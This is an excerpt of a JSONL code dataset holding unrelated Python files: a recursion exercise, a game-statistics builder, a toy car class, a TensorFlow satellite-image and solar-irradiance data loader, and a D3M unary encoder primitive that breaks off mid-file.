pi to get a new set of processes\n process_status = pi.validate_number_processes(pmc)\n\n # print process_status['message']\n sys.exit(process_status['exit_code'])\n","sub_path":"dynamic_process_monitor/lib/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"408198004","text":"#indirect recursion\n\ni = 1\ndef disp():\n\tglobal i\n\tprint(\"hello\")\n\ti = i + 1\n\t\n\tif(i<=5):\n\t\tshow()\n\t\treturn\n\tprint(\"bye from disp\")\n\t\ndef show():\n\tglobal i\n\tprint(\"hi\")\n\ti = i + 1\n\t\n\tif(i<=5):\n\t\tdisp()\n\t\t\nprint(\"before recursion\")\n#show()\ndisp()\nprint(\"after recursion\")\n'''\nhello(2) \thi(3)\t hello(4) \t hi(5)\t\thello(6)bye from disp\ndisp() <==> show() <==> disp() <==> show() <==> disp()\n'''","sub_path":"Recursion/rec_in7.py","file_name":"rec_in7.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"149618652","text":"import pandas as pd\nfrom copy import deepcopy\n\ndef get_ms(frame, kda, items, tower, dragon):\n column_p = ['gameid', 'minute', 'kills', 'deaths', 'assists', 'level', 'items', 'gold', 'cs']\n minute_p_df = pd.DataFrame(index=[i for i in range(len(frame)-1)], columns=column_p)\n \n minute_p_df['minute'] = [i for i in range(1,len(frame))]\n minute_p_df['kills'] = kda['kills']\n minute_p_df['deaths'] = kda['deaths']\n minute_p_df['assists'] = kda['assists']\n \n if len(frame)-1 > len(items):\n for _ in range(len(frame)-1-len(items)):\n items.append(items[-1])\n elif len(frame)-1 < len(items):\n items = items[:len(frame)-1]\n minute_p_df['items'] = items\n \n level, gold, cs = [], [], []\n for i in range(len(frame)):\n minute_data = pd.DataFrame(frame.iloc[i].values(), index=frame.iloc[i].keys()).sort_values('participantId')\n level.append(minute_data['level'].values.tolist())\n gold.append(minute_data['totalGold'].values.tolist())\n cs.append((minute_data['minionsKilled']+minute_data['jungleMinionsKilled']).values.tolist())\n minute_p_df['level'] = level[1:]\n minute_p_df['gold'] = gold[1:]\n minute_p_df['cs'] = cs[1:]\n \n \n \n column_t = ['gameid', 'minute', 'golds', 'kills', 'towers', 'dragons']\n minute_t_df = pd.DataFrame(index=[i for i in range(len(frame)-1)], columns=column_t)\n minute_t_df['minute'] = [i for i in range(1,len(frame))]\n \n gold_blue = [sum(golds[:5]) for golds in minute_p_df['gold'].tolist()]\n gold_red = [sum(golds[5:]) for golds in minute_p_df['gold'].tolist()]\n minute_t_df['golds'] = [[gold_blue[i],gold_red[i]] for i in range(len(frame)-1)]\n \n kill_blue = [sum(kills[:5]) for kills in kda['kills']]\n kill_red = [sum(kills[5:]) for kills in kda['kills']]\n minute_t_df['kills'] = [[kill_blue[i],kill_red[i]] for i in range(len(frame)-1)]\n \n towers = [0, 0]\n towers_m = []\n for i in range(len(tower)):\n event = tower.iloc[i]\n if event['building'][0] == 'T':\n time = event['tstamp']//60000 + 1\n if len(towers_m) < time:\n for _ in range(time-1-len(towers_m)):\n towers_m.append(deepcopy(towers))\n if event['team'] == 'RED': towers[0] += 1\n else: towers[1] += 1\n for _ in range(len(frame)-1-len(towers_m)):\n towers_m.append(deepcopy(towers))\n minute_t_df['towers'] = towers_m\n \n dragons = [['_'], ['_']]\n dragons_m = []\n dragon_count, spirit = 0, None\n for i in range(len(dragon)):\n event = dragon.iloc[i]\n if event['monster'][0] == 'D':\n time = event['tstamp']//60000 + 1\n if len(dragons_m) < time:\n for _ in range(time-1-len(dragons_m)):\n dragons_m.append(deepcopy(dragons))\n if event['team'] == 'BLUE': \n if dragons[0][0] == '_': dragons[0][0] = event['monster'].split('_')[1]\n else : dragons[0].append(event['monster'].split('_')[1])\n else:\n if dragons[1][0] == '_': dragons[1][0] = event['monster'].split('_')[1]\n else: dragons[1].append(event['monster'].split('_')[1])\n for _ in range(len(frame)-1-len(dragons_m)):\n dragons_m.append(deepcopy(dragons))\n \n for i in range(len(dragons_m)):\n if len(dragons_m[i][0]) > len(dragons_m[i][1]):\n for _ in range(len(dragons_m[i][0])-len(dragons_m[i][1])):\n dragons_m[i][1].append('_')\n elif len(dragons_m[i][0]) < len(dragons_m[i][1]):\n for _ in range(len(dragons_m[i][1])-len(dragons_m[i][0])):\n dragons_m[i][0].append('_')\n \n minute_t_df['dragons'] = dragons_m\n \n \n return minute_p_df, minute_t_df\n","sub_path":"v4/make_minute.py","file_name":"make_minute.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"219222870","text":"from time import sleep # Import this shitty library\n# Creatin a class called Cars\n\nclass Cars:\n \"\"\" The main car's Class \"\"\"\n\n def __init__(self,name,speed,fuel):\n print(\"Getting Data! \")\n self.name = name\n self.speed = speed\n self.fuel = fuel\n\n if type(self.name) != str or self.name == \"\":\n print(\"You didn't write a name! \")\n str(\"Press any key to exit \")\n exit()\n else:\n pass\n\n \n def increment(self,count):\n \"\"\" increment method \"\"\"\n print(\"Incrementing the speed... \")\n sleep(3)\n while self.speed < count:\n self.speed = self.speed + 5\n if self.speed == count:\n print(\"The speed is good according what you want!\")\n print(self.speed)\n break #Stop the loop\n else:\n continue #Continue the loop :) until gets the correct value \n\n \n def decrement(self,count):\n \"\"\" decrement method \"\"\"\n print(\"Decrementing the speed... \")\n sleep(3)\n while self.speed > count:\n self.speed = self.speed - 5\n if self.speed == count:\n print(\"The value of speed as you want!\")\n print(self.speed)\n break\n else:\n continue\n\n\n#Attributes\nuser_car = Cars(\"Dacia\",210,1)\nuser_car.increment(270)\n","sub_path":"source-code.py","file_name":"source-code.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"470155270","text":"import time\nimport threading\nimport os\nimport cv2 as cv\n\nimport pickle as pkl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport pandas as pd\nfrom tqdm import tqdm\n# from utilities.utility import get_datetime_attrs\nfrom matplotlib.patches import Rectangle\n\nfrom utilities.utility import load_catalog\nfrom utilities.utility import read_ncdf\nfrom utilities.utility import read_hdf5\nfrom utilities.utility import map_coord_to_pixel\nfrom utilities.utility import fetch_channel_samples\nfrom utilities.utility import plot_and_save_image\nfrom utilities.config import init_args\nfrom utilities.config import CROP_SIZE\nfrom utilities.utility import *\n\n# loads dataset and iterates over dataframe rows as well as hdf5 and nc\n# files for processing\n\n\ndef load_dataset(args):\n catalog = load_catalog(args.data_catalog_path)\n for index, row in catalog.iterrows():\n ncdf_path = row['ncdf_path']\n hdf5_8 = row['hdf5_8bit_path']\n hdf5_16 = row['hdf5_16bit_path']\n # if .nc doesn't exist, then skip example\n if row['ncdf_path'] == \"nan\":\n continue\n ncdf_data = read_ncdf(ncdf_path)\n h5_data = read_hdf5(hdf5_16)\n\n # print(ncdf_data.dimensions)\n # print(ncdf_data.variables.keys())\n # print(ncdf_data.ncattrs)\n\n # extracts meta-data to map station co-ordinates to pixels\n lat_min = ncdf_data.attrs['geospatial_lat_min'][0]\n lat_max = ncdf_data.attrs['geospatial_lat_max'][0]\n lon_min = ncdf_data.attrs['geospatial_lon_min'][0]\n lon_max = ncdf_data.attrs['geospatial_lon_max'][0]\n lat_res = ncdf_data.attrs['geospatial_lat_resolution'][0]\n lon_res = ncdf_data.attrs['geospatial_lon_resolution'][0]\n\n station_coords = []\n for sta, (lat, lon, elev) in args.station_data.items():\n # y = row data (longitude: changes across rows i.e. vertically)\n # x = column data (latitude: changes across columns i.e\n # horizontally)\n x, y = [\n map_coord_to_pixel(\n lat, lat_min, lat_res), map_coord_to_pixel(\n lon, lon_min, lon_res)]\n station_coords.append([y, x])\n station_coords = np.array(station_coords)\n\n # reads h5 and ncdf samples\n h5_16bit_samples = fetch_channel_samples(\n args, h5_data, row['hdf5_16bit_offset'])\n ncdf_samples = [ncdf_data.variables[ch][0] for ch in args.channels]\n\n plot_and_save_image(\n args,\n station_coords,\n h5_16bit_samples,\n prefix=\"h5_16\")\n plot_and_save_image(args, station_coords, ncdf_samples, prefix=\"ncdf\")\n break\n\n\n# pre process dataset to remove common nans in dataframe\ndef pre_process(dataset):\n # no night time data\n pp_dataset = dataset[(dataset.BND_DAYTIME == 1) | (dataset.TBL_DAYTIME == 1) | (dataset.DRA_DAYTIME == 1) | (\n dataset.FPK_DAYTIME == 1) | (dataset.GWN_DAYTIME == 1) | (dataset.PSU_DAYTIME == 1) | (dataset.SXF_DAYTIME == 1)]\n\n # no empty path images\n pp_dataset = pp_dataset[pp_dataset.ncdf_path != \"nan\"]\n\n # make iso_datetime a column instead of index\n pp_dataset = pp_dataset.reset_index()\n\n # shuffle all rows of dataset\n # !!! REMOVE FOR CONSIDERING TIME SEQUENCING ###\n # pp_dataset = pp_dataset.sample(frac=1).reset_index(drop=True)\n # pp_dataset = pp_dataset.reset_index(drop=True)\n\n return pp_dataset\n\n\ndef station_from_row(args, rows):\n x = []\n y = []\n # R! vectorize this by using iloc instead of iterrows?\n for _, row in rows.iterrows():\n ncdf_path = row['ncdf_path']\n hdf5_8 = row['hdf5_8bit_path']\n hdf5_16 = row['hdf5_16bit_path']\n # if .nc doesn't exist, then skip example\n if row['ncdf_path'] == \"nan\":\n continue\n\n if args.image_data == 'hdf5v7_8bit':\n data_handle = read_hdf5(hdf5_8)\n idx = row['hdf5_8bit_offset']\n samples = fetch_channel_samples(args, data_handle, idx)\n elif args.image_data == 'hdf5v5_16bit':\n data_handle = read_hdf5(hdf5_16)\n idx = row['hdf5_16bit_offset']\n samples = fetch_channel_samples(args, data_handle, idx)\n elif args.image_data == 'netcdf':\n data_handle = read_ncdf(ncdf_path)\n samples = [data_handle.variables[ch][0] for ch in args.channels]\n\n # extracts meta-data to map station co-ordinates to pixels\n station_coords = {}\n if args.image_data == 'hdf5v7_8bit' or args.image_data == 'hdf5v5_16bit':\n lats, lons = utils.fetch_hdf5_sample(\n \"lat\", data_handle, idx), utils.fetch_hdf5_sample(\n \"lon\", data_handle, idx)\n for sta, (lat, lon, elev) in args.station_data.items():\n # y = row data (longitude: changes across rows i.e. vertically)\n # x = column data (latitude: changes across columns i.e\n # horizontally)\n x_coord, y_coord = [\n np.argmin(np.abs(lats - lat)), np.argmin(np.abs(lons - lon))]\n station_coords[sta] = [y_coord, x_coord]\n # print(x_coord,y_coord)\n else:\n lat_min = data_handle.attrs['geospatial_lat_min'][0]\n lat_max = data_handle.attrs['geospatial_lat_max'][0]\n lon_min = data_handle.attrs['geospatial_lon_min'][0]\n lon_max = data_handle.attrs['geospatial_lon_max'][0]\n lat_res = data_handle.attrs['geospatial_lat_resolution'][0]\n lon_res = data_handle.attrs['geospatial_lon_resolution'][0]\n\n for sta, (lat, lon, elev) in args.station_data.items():\n # y = row data (longitude: changes across rows i.e. vertically)\n # x = column data (latitude: changes across columns i.e\n # horizontally)\n x_coord, y_coord = [\n map_coord_to_pixel(\n lat, lat_min, lat_res), map_coord_to_pixel(\n lon, lon_min, lon_res)]\n station_coords[sta] = [y_coord, x_coord]\n\n samples = np.array(samples)\n print(\"sample shape:\", samples.shape)\n\n for station_i in config.STATION_NAMES:\n # station_i = 'FPK'\n if row[[station_i + \"_GHI\"]].isnull()[0]:\n # print(\"[INFO] GHI is null for station \", station_i)\n continue\n elif row[[station_i + \"_DAYTIME\"]][0] == 0:\n # print(\"[INFO] Night for station \", station_i)\n continue\n # print(station_i)\n\n y.append(row[station_i + \"_GHI\"])\n # ini = time.time()\n # print(station_coords)\n x.append(crop_station_image(station_i, samples, station_coords))\n # print(\"cropping time: \", time.time()-ini)\n return x, y\n\n# crop station image from satellite image of size CROP_SIZE\n\n# gets station information and returns crops\ndef crop_station_image(station_i, sat_image, station_coords):\n\n # R! check crop correct positions? and also if lower origin needs to be\n # taken before manual cropping\n\n crop_size = args.CROP_SIZE\n\n # fig,ax = plt.subplots(1)\n # ax.imshow(sat_image[0], cmap='bone')\n # rect = Rectangle((station_coords[station_i][0]-(crop_size//2),station_coords[station_i][1]-(crop_size//2)),crop_size,crop_size,linewidth=1,fill=True,edgecolor='r',facecolor='none')\n # ax.add_patch(rect)\n # plt.scatter(station_coords[station_i][0],station_coords[station_i][1])\n # plt.savefig(\"check_crop.png\")\n\n # print(\"in crop station image: \", station_coords[station_i][1]-(crop_size//2),\" - \" , (station_coords[station_i][1]+(crop_size//2)))\n margin = crop_size // 2\n lat_mid = station_coords[station_i][1]\n lon_mid = station_coords[station_i][0]\n crop = sat_image[\n :,\n lat_mid - margin:lat_mid + margin,\n lon_mid - margin:lon_mid + margin,\n ]\n\n if crop.shape != (5, crop_size, crop_size):\n print(\"[WARNING] crop channels shape:\", station_i,\n [crop[i].shape for i in range(len(crop))])\n\n # plt.imshow(crop[0], cmap='bone')\n # plt.savefig(\"check_cropped.png\")\n\n return crop\n\n\nclass SimpleDataLoader(tf.data.Dataset):\n\n def __new__(cls, args, catalog):\n\n return tf.data.Dataset.from_generator(\n lambda: cls._generator(args, catalog),\n output_types=(tf.float32, tf.float32)\n # args=(args,catalog)\n )\n\n def _generator(args, catalog):\n\n STEP_SIZE = args.batch_size\n # STEP_SIZE =\n START_IDX = 0\n END_IDX = STEP_SIZE * 3 # len(catalog)\n\n if args.debug:\n STEP_SIZE = 1\n END_IDX = STEP_SIZE * 3\n\n for index in tqdm(range(START_IDX, END_IDX, STEP_SIZE)):\n # while(index < len(catalog)):\n\n rows = catalog[index: index + STEP_SIZE]\n # print(rows)\n\n if args.debug:\n profiler = LineProfiler()\n profiled_func = profiler(station_from_row)\n try:\n profiled_func(args, rows, x, y)\n finally:\n profiler.print_stats()\n profiler.dump_stats('data_loader_dump.txt')\n else:\n x, y = station_from_row(args, rows)\n\n x = np.array(x)\n y = np.array(y)\n print(\n \"Yielding x (shape) and y (shape) of index: \",\n index,\n x.shape,\n y.shape)\n\n yield (x, y)\n\n\ndef store_numpy(ndarray_dict, filepath):\n os.makedirs('npz_store', exist_ok=True)\n path = os.path.splitext(os.path.basename(filepath))[0] + \".npz\"\n path = os.path.join('npz_store', path)\n np.savez(path, **ndarray_dict)\n\n\ndef store_pickle(ndarray_dict, filepath):\n os.makedirs('pickle_store', exist_ok=True)\n path = os.path.splitext(os.path.basename(filepath))[0] + \".dat\"\n path = os.path.join('pickle_store', path)\n # np.savez(path, **ndarray_dict)\n with open(path, 'wb') as outfile:\n pickle.dump(ndarray_dict, outfile, protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef load_pickle(filepath):\n path = os.path.splitext(os.path.basename(filepath))[0] + \".dat\"\n path = os.path.join('pickle_store', path)\n # np.savez(path, **ndarray_dict)\n with open(path, 'rb') as infile:\n ndarray_dict = pickle.load(infile)\n return ndarray_dict\n\n\ndef load_numpy(filepath):\n path = os.path.splitext(os.path.basename(filepath))[0] + \".npz\"\n path = os.path.join('npz_store', path)\n ndarray_dict = np.load(path)\n return ndarray_dict\n\n# generates t0-1 and t0 data\n\n\nclass SequenceDataLoader(tf.data.Dataset):\n\n def __new__(cls, args, catalog):\n\n return tf.data.Dataset.from_generator(\n lambda: cls._generator(args, catalog),\n output_types=(tf.float32, tf.float32)\n # args=(args,catalog)\n )\n\n def _generator(args, catalog):\n\n unique_paths = pd.unique(catalog['hdf5_8bit_path'].values.ravel())\n print(unique_paths)\n STEP_SIZE = 1 # args.batch_size\n # STEP_SIZE =\n START_IDX = 0\n END_IDX = STEP_SIZE * 100 # len(catalog)\n\n if args.debug:\n STEP_SIZE = 1\n END_IDX = STEP_SIZE * 3\n\n for path in tqdm(unique_paths):\n\n samples = fetch_all_samples_hdf5(args, path)\n\n # grouping by paths\n grouped = catalog[path == catalog.hdf5_8bit_path]\n offsets_1 = {} # T0 - 1\n offsets_0 = {} # T0\n example_pairs = {}\n for station in args.station_data.keys():\n df = grouped[grouped.station == station]\n argsort = np.argsort(df['hdf5_8bit_offset'].values)\n offsets_1[station] = df['hdf5_8bit_offset'].values[argsort]\n offsets_0[station] = offsets_1[station] + 4\n\n # if offsets+4 offset exists, we create pairs using those\n # offsets+4 since T0-1 exists by definition\n matching_offsets = np.intersect1d(\n offsets_1[station], offsets_0[station])\n # pairs = zip(matching_offsets-4,matching_offsets)\n GHI_pairs = zip(df[df.hdf5_8bit_offset.isin(matching_offsets - 4)].GHI.values,\n df[df.hdf5_8bit_offset.isin(matching_offsets)].GHI.values)\n offset_pairs = zip(matching_offsets - 4, matching_offsets)\n\n example_pairs[station] = zip(offset_pairs, GHI_pairs)\n # print(example_pairs)\n for station, ex_pair in example_pairs.items():\n # for offset,GHI in ex_pair:\n for (offset_1, offset_0), (GHI_1, GHI_0) in ex_pair:\n # for a in ex_pair:\n # print(list(offset))\n img_1 = samples[station][offset_1]\n img_0 = samples[station][offset_0]\n yield (img_1, img_0), (GHI_1, GHI_0)\n\n# generates t0-1 and t0 data\n\n\nclass SequenceDataLoaderMemChunks(tf.data.Dataset):\n\n def __new__(cls, args, catalog):\n if args.k_sequences == 0:\n output_shapes = (\n tf.TensorShape(\n (None, None, None)), tf.TensorShape(\n (args.future_ghis + 1, )))\n else:\n output_shapes = (\n tf.TensorShape(\n (None, None, None, None)), tf.TensorShape(\n (args.future_ghis + 1, )))\n return tf.data.Dataset.from_generator(\n lambda: cls._generator(args, catalog),\n output_types=((tf.float32, tf.float32, tf.float32), tf.float32),\n # output_shapes=output_shapes\n # args=(args,catalog)\n )\n\n def _generator(args, catalog):\n\n unique_paths = pd.unique(catalog['hdf5_8bit_path'].values.ravel())\n # print(unique_paths)\n STEP_SIZE = 1 # args.batch_size\n # STEP_SIZE =\n START_IDX = 0\n END_IDX = STEP_SIZE * 100 # len(catalog)\n\n if args.debug:\n STEP_SIZE = 1\n END_IDX = STEP_SIZE * 3\n counter = 0\n\n k_sequences = args.k_sequences # in the past, addition to T0\n img_sequence_step = args.img_sequence_step\n GHI_sequence_steps = [4, 8, 12] # in the future, in addition to T0\n GHI_sequence_steps_reverse = [24, 20, 12, 0][-(args.future_ghis + 1):]\n GHI_sequence_steps = GHI_sequence_steps[:args.future_ghis]\n # GHI_sequence_steps.reverse()\n for i in range(1):\n for path in tqdm(unique_paths):\n\n # samples = fetch_all_samples_hdf5(args,path)\n # store_numpy(samples,path)\n samples = load_numpy(path)\n # continue\n # grouping by paths\n grouped = catalog[path == catalog.hdf5_8bit_path]\n offsets_1 = {} # T0 - 1\n offsets_0 = {} # T0\n example_pairs = {}\n offsets_list = []\n for station in args.station_data.keys():\n df = grouped[grouped.station == station]\n argsort = np.argsort(df['hdf5_8bit_offset'].values)\n offsets_1[station] = df['hdf5_8bit_offset'].values[argsort]\n offsets_0[station] = offsets_1[station] + img_sequence_step\n matching_offsets_imgs = df['hdf5_8bit_offset'].values[argsort]\n for i in range(k_sequences):\n matching_offsets_imgs = np.intersect1d(\n matching_offsets_imgs, matching_offsets_imgs + img_sequence_step)\n # offsets_plus_1[station] = offsets_1[station] + 8\n\n # if offsets+4 offset exists, we create pairs using those offsets+4 since T0-1 exists by definition\n # matching_offsets_imgs = np.intersect1d(offsets_1[station],offsets_0[station])\n # pairs = zip(matching_offsets-4,matching_offsets)\n\n # For GHIs\n matching_offsets_GHIs = matching_offsets_imgs\n for GHI_sequence_step in GHI_sequence_steps:\n matching_offsets_GHIs = np.intersect1d(\n matching_offsets_GHIs, matching_offsets_GHIs + GHI_sequence_step)\n # matching_offsets_GHIs = np.intersect1d(matching_offsets_imgs, matching_offsets_imgs + GHI_sequence_step)\n\n GHI_pairs_list = []\n CS_GHI_pairs_list = []\n for i, GHI_sequence_step in enumerate(\n GHI_sequence_steps_reverse):\n GHI_pairs_list.append(df[df.hdf5_8bit_offset.isin(\n matching_offsets_GHIs - GHI_sequence_step)].GHI.values)\n CS_GHI_pairs_list.append(df[df.hdf5_8bit_offset.isin(\n matching_offsets_GHIs - GHI_sequence_step)].CLEARSKY_GHI.values)\n\n GHI_pairs = zip(*GHI_pairs_list)\n CS_GHI_pairs = zip(*CS_GHI_pairs_list)\n\n # import pdb\n # pdb.set_trace()\n iso_dt = df[df.hdf5_8bit_offset.isin(\n matching_offsets_imgs)]['iso-datetime'].tolist()\n date_time_attrs = [get_datetime_attrs(dt) for dt in iso_dt]\n # for images\n # offset_pairs = zip(matching_offsets-4,matching_offsets)\n offsets_pairs_list = []\n for i in range(k_sequences):\n offsets_pairs_list.append(\n matching_offsets_imgs - (k_sequences + i))\n offsets_pairs_list.append(matching_offsets_imgs)\n offset_pairs = zip(*offsets_pairs_list)\n # offset_pairs = zip(matching_offsets_imgs - img_sequence_step, matching_offsets_imgs)\n\n # example_pairs[station] = zip(offset_pairs,GHI_pairs)\n sample = samples[station]\n example_pair = zip(\n offset_pairs, date_time_attrs, CS_GHI_pairs, GHI_pairs)\n # for (offset_1,offset_0),(GHI_0,GHI_plus_1) in\n # example_pair:\n for offsets, date_time_pair, CS_GHIs, GHIs in example_pair:\n imgs = []\n for offset in offsets:\n img = sample[offset].swapaxes(0, 1).swapaxes(1, 2)\n imgs.append(img)\n # img_1 = sample[offset_1].swapaxes(0,1).swapaxes(1,2)\n # img_0 = sample[offset_0].swapaxes(0,1).swapaxes(1,2)\n if args.k_sequences == 0:\n imgs = imgs[0]\n if args.use_metadata:\n a = (imgs, date_time_pair, CS_GHIs)\n # print(\"shape:\",tf.shape(a))\n # import pdb\n # pdb.set_trace()\n yield (imgs, date_time_pair, CS_GHIs), (GHIs)\n else:\n yield imgs, GHIs\n # yield (img_1,img_0),(GHI_0)\n # print(example_pairs)\n\n\ndef iterate_and_fetch_all_samples_hdf5(args, paths):\n for path in paths:\n samples = fetch_all_samples_hdf5(args, path)\n store_numpy(samples, path)\n # store_pickle(samples,path)\n # load_numpy(path)\n # load_pickle(path)\n print(\"stored %s\" % path)\n\n# generates t0-1 and t0 data\n\n\nclass SequenceDataLoaderThreaded(tf.data.Dataset):\n\n def __new__(cls, args, catalog):\n\n return tf.data.Dataset.from_generator(\n lambda: cls._generator(args, catalog),\n output_types=(tf.float32, tf.float32)\n # args=(args,catalog)\n )\n\n def _generator(args, catalog):\n\n unique_paths = pd.unique(catalog['hdf5_8bit_path'].values.ravel())\n print(unique_paths)\n STEP_SIZE = 1 # args.batch_size\n # STEP_SIZE =\n START_IDX = 0\n END_IDX = STEP_SIZE * 100 # len(catalog)\n\n if args.debug:\n STEP_SIZE = 1\n END_IDX = STEP_SIZE * 3\n\n # Create a mechanism for monitoring when all threads are finished.\n coord = tf.train.Coordinator()\n num_threads = 5\n threads = []\n\n unique_paths = unique_paths.tolist()\n size = len(unique_paths)\n\n for thread_index in range(num_threads):\n from_ = size // num_threads * (thread_index)\n upto = size // num_threads * (thread_index + 1)\n args1 = (args, unique_paths[from_:upto])\n t = threading.Thread(\n target=iterate_and_fetch_all_samples_hdf5, args=args1)\n t.start()\n threads.append(t)\n\n # Wait for all the threads to terminate.\n coord.join(threads)\n print(\"exiting\")\n return\n\n# loads dataset and iterates over dataframe rows as well as hdf5 and nc\n# files for processing\n\n\ndef load_dataset(args):\n catalog = load_catalog(args.data_catalog_path)\n catalog = pre_process(catalog)\n\n sdl = SimpleDataLoader(\n args, catalog).prefetch(\n tf.data.experimental.AUTOTUNE).cache()\n\n for epoch in range(args.epochs):\n # iterate over epochs\n print(\"Epoch: %d\" % epoch)\n for i, j in sdl:\n print(i.shape, j.shape)\n # print(\"Incoming x and y: \", i,j)\n\n# loads dataset and iterates over dataframe rows as well as hdf5 and nc\n# files for processing\n\n\ndef load_dataset_seq(args):\n catalog = load_catalog(args.data_catalog_path)\n\n sdl = SequenceDataLoaderThreaded(args, catalog)\n # sdl = SequenceDataLoaderMemChunks(args, catalog)\n # sdl = sdl.map(lambda x,y: (x,y), num_parallel_calls=4)\n sdl = sdl.prefetch(tf.data.experimental.AUTOTUNE)\n\n for epoch in range(args.epochs):\n # iterate over epochs\n print(\"Epoch: %d\" % epoch)\n for (img_1, img_0), (GHI_1, GHI_0) in sdl:\n # print(img_1.shape,img_0.shape)\n pass\n\n\ndef extract_at_time(time, ctlg):\n pass\n\n\ndef create_data_loader():\n pass\n\n\ndef data_loader_main():\n args = init_args()\n load_dataset_seq(args)\n\n\nif __name__ == \"__main__\":\n data_loader_main()\n","sub_path":"utilities/dataloader2.py","file_name":"dataloader2.py","file_ext":"py","file_size_in_byte":22454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"48483895","text":"import pandas as pd # type: ignore\nimport numpy as np # type: ignore\nimport copy\nimport typing\n\nimport d3m\nfrom d3m.primitive_interfaces.unsupervised_learning import UnsupervisedLearnerPrimitiveBase\nfrom d3m.metadata import hyperparams, params\nfrom d3m.primitive_interfaces.base import CallResult\n\nfrom . import config\n\nInput = d3m.container.DataFrame\nOutput = d3m.container.DataFrame\n\nclass Params(params.Params):\n mapping : typing.Dict\n all_columns : typing.Set[str]\n empty_columns : typing.List\n textmapping : typing.Dict\n target_columns : typing.List[int]\n\n\nclass UEncHyperparameter(hyperparams.Hyperparams):\n text2int = hyperparams.UniformBool(\n default=True,\n description='Whether to convert everything to numerical. For text columns, each row may get converted into a column',\n semantic_types=['http://schema.org/Boolean',\n 'https://metadata.datadrivendiscovery.org/types/ControlParameter'])\n targetColumns = hyperparams.Hyperparameter[typing.List[int]](\n default=[],\n description='List of indices of columns to be encoded',\n semantic_types=['https://metadata.datadrivendiscovery.org/types/TuningParameter',\n 'https://metadata.datadrivendiscovery.org/types/TabularColumn']\n )\n\n## reference: https://github.com/scikit-learn/scikit-learn/issues/8136\nclass Label_encoder(object):\n def __init__(self):\n self.class_index = None\n\n def fit_pd(self, df, cols=[]):\n '''\n fit all columns in the df or specific list.\n generate a dict:\n {feature1:{label1:1,label2:2}, feature2:{label1:1,label2:2}...}\n '''\n if len(cols) == 0:\n cols = df.columns\n self.class_index = {}\n for f in cols:\n uf = df[f].unique()\n self.class_index[f] = {}\n index = 1\n for item in uf:\n self.class_index[f][item] = index\n index += 1\n\n def transform_pd(self,df,cols=[]):\n '''\n transform all columns in the df or specific list from lable to index, return and update dataframe.\n '''\n newdf = copy.deepcopy(df)\n if len(cols) == 0:\n cols = df.columns\n for f in cols:\n if f in self.class_index:\n newdf[f] = df[f].apply(lambda d: self.__update_label(f,d))\n return newdf\n\n def get_params(self):\n return self.class_index\n\n def set_params(self, textmapping):\n self.class_index = textmapping\n\n def __update_label(self,f,x):\n '''\n update the label to index, if not found in the dict, add and update the dict.\n '''\n try:\n return self.class_index[f][x]\n except:\n self.class_index[f][x] = max(self.class_index[f].values())+1\n return self.class_index[f][x]\n\n\nclass UnaryEncoder(UnsupervisedLearnerPrimitiveBase[Input, Output, Params, UEncHyperparameter]):\n\n metadata = hyperparams.base.PrimitiveMetadata({\n \"id\": \"DSBox-unary-encoder\",\n \"version\": config.VERSION,\n \"name\": \"DSBox Unary Data Encoder\",\n \"description\": \"Encode using unary code for orinal data\",\n \"python_path\": \"d3m.primitives.dsbox.UnaryEncoder\",\n \"primitive_family\": \"DATA_CLEANING\",\n \"algorithm_types\": [ \"ENCODE_ONE_HOT\" ],\n \"source\": {\n \"name\": config.D3M_PERFORMER_TEAM,\n \"uris\": [ config.REPOSITORY ]\n },\n ### Automatically generated\n # \"primitive_code\"\n # \"original_python_path\"\n # \"schema\"\n # \"structural_type\"\n ### Optional\n \"keywords\": [ \"preprocessing\", \"encoding\"],\n \"installation\": [ config.INSTALLATION ],\n #\"location_uris\": [],\n #\"precondition\": [],\n #\"effects\": [],\n #\"hyperparms_to_tune\": []\n })\n\n def __repr__(self):\n return \"%s(%r)\" % ('UnaryEncoder', self.__dict__)\n\n\n def __init__(self, *, hyperparams: UEncHyperparameter) -> None:\n super().__init__(hyperparams=hyperparams)\n\n self.hyperparams = hyperparams\n\n self._text2int = hyperparams['text2int']\n self._target_columns = hyperparams['targetColumns']\n self._textmapping: typing.Dict = dict()\n self._mapping: typing.Dict = dict()\n self._all_columns: typing.Set = set()\n self._empty_columns: typing.List = []\n\n self._training_inputs = None\n self._fitted = False\n\n\n def get_params(self) -> Params:\n\n # Hack to work around pytypes bug. Covert numpy int64 to int.\n for key in self._mapping.keys():\n self._mapping[key] = [np.nan if np.isnan(x) else int(x) for x in self._mapping[key]]\n\n param = Params(mapping=self._mapping, all_columns=self._all_columns, empty_columns=self._empty_columns,\n textmapping=self._textmapping, target_columns = self._target_columns)\n return param\n\n\n def set_params(self, *, params: Params) -> None:\n self._fitted = True\n self._mapping = params['mapping']\n self._all_columns = params['all_columns']\n self._empty_columns = params['empty_columns']\n self._textmapping = params['textmapping']\n self._target_columns = params['target_columns']\n\n\n def set_training_data(self, *, inputs: Input) -> None:\n self._training_inputs = inputs\n self._fitted = False\n #self._target_columns = targets\n\n\n def fit(self, *, timeout:float = None, iterations: int = None) -> None:\n \"\"\"\n Need training data from set_training_data first.\n The encoder would record specified columns to encode and column values to\n unary encode later in the produce step.\n \"\"\"\n if self._fitted:\n return\n\n if self._training_inputs is None:\n raise ValueError('Missing training(fitting) data.')\n\n data_copy = self._training_inputs.copy()\n\n self._all_columns = set(data_copy.columns)\n\n # mapping\n if self._target_columns and max(self._target_columns) > len(data_copy.columns)-1:\n raise ValueError('Target columns are not subset of columns in training_inputs.(Out of range).')\n\n idict = {}\n for target_id in self._target_columns:\n name = data_copy.columns[target_id]\n col = data_copy[name]\n idict[name] = sorted(col.unique())\n self._mapping = idict\n\n if self._text2int:\n texts = data_copy.drop(self._mapping.keys(),axis=1)\n texts = texts.select_dtypes(include=[object])\n le = Label_encoder()\n 